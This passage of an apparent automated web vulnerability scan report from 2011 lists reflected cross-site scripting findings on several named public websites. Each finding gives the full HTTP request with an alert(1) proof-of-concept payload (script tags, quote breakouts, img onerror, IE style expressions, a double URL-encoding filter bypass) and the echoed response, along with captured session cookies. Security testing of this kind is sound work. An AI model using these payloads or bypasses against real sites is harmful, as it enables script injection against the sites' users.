_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
TMa%2FJr5D6uvrPpcnlWeaFL5og7AM0BH%2BH4fN8MXm9UXeJn6xaX4%2ByP8BKOI2IQ%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.9348020141478628466b0<script>alert(1)</script>06150d728a4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:51:34 GMT
Content-Length: 5755

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.9348020141478628466b0<script>alert(1)</script>06150d728a4<&>
...[SNIP]...

5.219. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload fdc1c<script>alert(1)</script>2d43224a51b was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T%2B41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b&__VIEWSTATE=1eNrdW01sG8cVFilRliLbdGOLdRGXGruuf2KRXP5TspWYomRLsaQooiQ7MQRlyB1y11rusrNDUuyhSH%2BPBQoUMdpDiwY9tEVR9NJbgRbtKWib%2FhwKtEefemrS9BfoT%2FpmdilyJTkyJQoKQwOa3dl5M2%2Fe970382bX77m8Xs9QIBwPx2Ip%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:50:35 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
   ViewState: /wEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T+41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b --->
...[SNIP]...

5.220. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffd1"-alert(1)-"dabd45c1f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:51:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:51:01 GMT
Content-Length: 34857


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?3ffd1%22-alert(1)-%22dabd45c1f1a=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

5.221. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Issue detail

The value of the Alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73dfb"-alert(1)-"905ea5234ca was submitted in the Alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:54:12 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:54:12 GMT
Content-Length: 16872


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb%22-alert(1)-%22905ea5234ca&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;Ite
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715", "/FusionVM/go/www.fusionvm/0/en-US/username=/OU0/Default.aspx");</script>
...[SNIP]...

5.222. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Issue detail

The value of the Lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ec"-alert(1)-"99c3d54552a was submitted in the Lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:55:07 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:55:06 GMT
Content-Length: 16872


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-USfd6ec%22-alert(1)-%2299c3d54552a&amp;OU=0&amp;Ite
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715", "/FusionVM/go/www.fusionvm/0/en-US/username=/OU0/Default.aspx");</script>
...[SNIP]...

5.223. http://www.magellangps.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb4e2'style='x:expression(alert(1))'2dba5efe1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /?bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7=1 HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:52 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1673890758:73686F702D6A6176613031372E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=yLNYN37LTf8tt0v5tRTL6LZ0wQGcSKMfxrfQtyLqRZFsv031yGCL9KmmjLhrVNjH2mFcVB127T22RhQy3KqmJpjRJyL6vyVyyZltQVMWwx133pGdMZpBVWnzTgQ61lVs!-1880311767; path=/
Set-Cookie: NLVisitorId=rcHW8655AcMJwTlB; domain=www.magellangps.com; expires=Monday, 16-Apr-2012 21:39:53 GMT; path=/
Set-Cookie: NLShopperId=rcHW8655AcgJweiI; domain=www.magellangps.com; expires=Tuesday, 03-May-2011 21:39:53 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=www.magellangps.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 77203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-Strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.magellangps.com/?bb4e2%27style%3d%27x%3aexpression%28alert%281%29%29%272dba5efe1c7=1&bb4e2'style='x:expression(alert(1))'2dba5efe1c7=1'>
...[SNIP]...

5.224. http://www.magellangps.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14994%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d346e0b5a0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14994'style='x:expression(alert(1))'d346e0b5a0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl?sc=3&custcol_celigo_serialno=&docookiecheck=T&whence=&14994%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d346e0b5a0f=1 HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/Products/eXploristseries
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.2.10.1303853977; NLShopperId=rcHW8655AeSHwA-v

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:29 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 684099100:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 86971


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.magellangps.com/s.nl?sc=3&14994%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d346e0b5a0f=1&whence=&custcol_celigo_serialno=&14994'style='x:expression(alert(1))'d346e0b5a0f=1&14994%27style%3d%27x%3aexpression%28alert%281%29%29%27d346e0b5a0f=1'>
...[SNIP]...

5.225. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /cgi-bin/feedback/feedback.php

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296c5"><script>alert(1)</script>422230dfc64 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64 HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:25 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
Content-Length: 6125
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Feedback for RandomHouse.com</title>
   <style type="text/css">
       body { width: 500px; padding: 0; margin: 0; }
       #comments {
           background-color: #ddd;
           font-family: verdana, ar
...[SNIP]...
<input type="hidden" name="referer" value="http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64">
...[SNIP]...

5.226. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /cgi-bin/feedback/feedback.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a11"><script>alert(1)</script>06c74c5b53b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/&b5a11"><script>alert(1)</script>06c74c5b53b=1 HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:28 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
Content-Length: 6128
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Feedback for RandomHouse.com</title>
   <style type="text/css">
       body { width: 500px; padding: 0; margin: 0; }
       #comments {
           background-color: #ddd;
           font-family: verdana, ar
...[SNIP]...
<input type="hidden" name="referer" value="http://www.randomhouse.com/&b5a11"><script>alert(1)</script>06c74c5b53b=1">
...[SNIP]...

5.227. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa was submitted in the cb parameter. This input was echoed as 783b4<img src=a onerror=alert(1)>1d40facd3aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rr&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 26 Apr 2011 22:09:46 GMT
Content-Length: 2565

r1eh783b4<img src=a onerror=alert(1)>1d40facd3aa({"Resonance":{"Response":[{"scheme":"cart_rr","display":"yes","output":"<div xmlns:ms=\"urn:schemas-microsoft-com:xslt\"><div id=\"recommend_horiz_capt
...[SNIP]...

5.228. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload fe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61 was submitted in the sc parameter. This input was echoed as fe0e1<img src=a onerror=alert(1)>1096c836d61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rrfe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 26 Apr 2011 22:08:44 GMT
Content-Length: 137

r1eh({"Resonance":{"Response":[{"scheme":"cart_rrfe0e1<img src=a onerror=alert(1)>1096c836d61","display":"no","output":"<div></div>"}]}})

5.229. http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /CatalogFeed/Stats

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251 was submitted in the REST URL parameter 2. This input was echoed as 21e7b<img src=a onerror=alert(1)>106cbf3251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /CatalogFeed/Stats21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251?callback=frontDoorStats HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:28 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/javascript

frontDoorStats({"percentChangeOfWidgetsphere":0,"search":"/Stats21e7b<img src=a onerror=alert(1)>106cbf3251","caffeineIdx":0.8000000000000000444089209850062616169452667236328125,"domainsWidgetized":8222145,"numWidgets":238505,"hitStats":{"dayWidgetHits":29614479,"startValue":27233395892,"monthWidgetHits":84
...[SNIP]...

5.230. http://www.widgetbox.com/CatalogFeed/Stats [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /CatalogFeed/Stats

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 87793<script>alert(1)</script>1ab895c59aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CatalogFeed/Stats?callback=frontDoorStats87793<script>alert(1)</script>1ab895c59aa HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
